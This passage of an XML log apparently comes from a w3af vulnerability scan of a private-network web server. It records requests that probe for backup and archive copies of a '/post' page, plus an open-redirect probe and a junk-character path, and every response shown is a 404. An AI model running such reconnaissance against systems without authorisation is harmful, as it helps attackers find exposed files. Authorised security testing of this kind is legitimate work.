                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="339">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="340">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="341">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="342">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="343">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="344">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="345">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="346">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="347">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="348">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="349">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="350">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="353">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="354">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="355">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="356">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="358">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="364">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="365">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="366">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
